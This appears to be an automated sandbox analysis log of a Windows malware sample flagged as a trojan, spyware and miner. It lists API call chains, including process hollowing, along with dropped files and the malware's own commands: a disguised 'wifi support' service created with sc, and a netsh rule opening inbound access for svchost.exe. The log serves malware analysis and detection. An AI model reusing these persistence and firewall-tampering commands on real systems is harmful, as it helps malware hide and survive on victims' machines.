Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_032CDE18
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_032C8658
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_032C8DE8
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_032C8DF8
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_0040C913
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 39_2_0032C913
Source: C:\Users\user\AppData\Local\Temp\7801.exe | Code function: 43_2_03009E20
Source: C:\Users\user\AppData\Local\Temp\7801.exe | Code function: 43_2_03009040
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,VirtualAlloc,
Source: U3E7zMaux2.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: U3E7zMaux2.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: U3E7zMaux2.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: U3E7zMaux2.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8ED5.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D984.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D984.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D984.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: E666.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7CA1.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 86C4.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B58B.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B58B.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: B58B.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7801.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7801.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 7801.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: BEB3.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uufaeea.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lagavljy.exe.21.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Section loaded: mscorjit.dll
Source: U3E7zMaux2.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows\SysWOW64\shayesoq\
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: String function: 00404CA4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\7801.exe | Code function: String function: 03000550 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: String function: 00402544 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe | Code function: String function: 004048D0 appears 460 times
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 0_2_00530110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_2_00402491 NtOpenKey,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Code function: 1_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\uufaeea | Code function: 12_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Code function: 19_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_0599F5C0 NtUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Code function: 22_2_0599F6A0 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
Source: U3E7zMaux2.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: D984.exe.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: E666.exe.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 7CA1.exe.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 86C4.exe.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: B58B.exe.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 7801.exe.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: uufaeea.7.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: lagavljy.exe.21.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: ACEF.exe.7.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 9A02.exe.7.dr | Static PE information: Section: .rsrc ZLIB complexity 0.997770524618
Source: ACEF.exe.7.dr | Static PE information: Section: ZLIB complexity 1.00044194799
Source: ACEF.exe.7.dr | Static PE information: Section: ZLIB complexity 1.00537109375
Source: BEB3.exe.7.dr | Static PE information: Section: .didata ZLIB complexity 0.999523355577
Source: CC60.exe.7.dr | Static PE information: Section: .rsrc ZLIB complexity 0.996134750716
Source: U3E7zMaux2.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\uufaeea
Source: classification engine | Classification label: mal100.troj.spyw.evad.mine.winEXE@60/50@96/18
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Code function: 36_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 39_2_00329A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Code function: 21_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe
Source: U3E7zMaux2.exe | Virustotal: Detection: 41%
Source: U3E7zMaux2.exe | ReversingLabs: Detection: 46%
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
Source: C:\Users\user\AppData\Roaming\uufaeea | Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\D984.exe C:\Users\user\AppData\Local\Temp\D984.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Users\user\AppData\Local\Temp\D984.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\7CA1.exe C:\Users\user\AppData\Local\Temp\7CA1.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\86C4.exe C:\Users\user\AppData\Local\Temp\86C4.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d"C:\Users\user\AppData\Local\Temp\86C4.exe"
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe | Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\7801.exe C:\Users\user\AppData\Local\Temp\7801.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\8ED5.exe C:\Users\user\AppData\Local\Temp\8ED5.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\9A02.exe C:\Users\user\AppData\Local\Temp\9A02.exe
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\8ED5.exe | Process created: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\738E.bat C:\Users\user\AppData\Local\Temp\9A02.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe C:\Users\user\AppData\Local\Temp\738C.tmp\738D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
Source: C:\Users\user\Desktop\U3E7zMaux2.exe | Process created: C:\Users\user\Desktop\U3E7zMaux2.exe "C:\Users\user\Desktop\U3E7zMaux2.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\D984.exe C:\Users\user\AppData\Local\Temp\D984.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\7CA1.exe C:\Users\user\AppData\Local\Temp\7CA1.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\86C4.exe C:\Users\user\AppData\Local\Temp\86C4.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
Source: C:\Users\user\AppData\Roaming\uufaeea | Process created: C:\Users\user\AppData\Roaming\uufaeea C:\Users\user\AppData\Roaming\uufaeea
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\E666.exe | Process created: C:\Users\user\AppData\Local\Temp\E666.exe C:\Users\user\AppData\Local\Temp\E666.exe
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
Source: C:\Users\user\AppData\Local\Temp\86C4.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description shayesoq "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start shayesoq
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeProcess created: C:\Users\user\AppData\Local\Temp\8EC4.exe C:\Users\user\AppData\Local\Temp\8EC4.exe
                          Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D984.tmp
                          Source: C:\Users\user\AppData\Local\Temp\86C4.exeCode function: 21_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\8EC4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_01
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
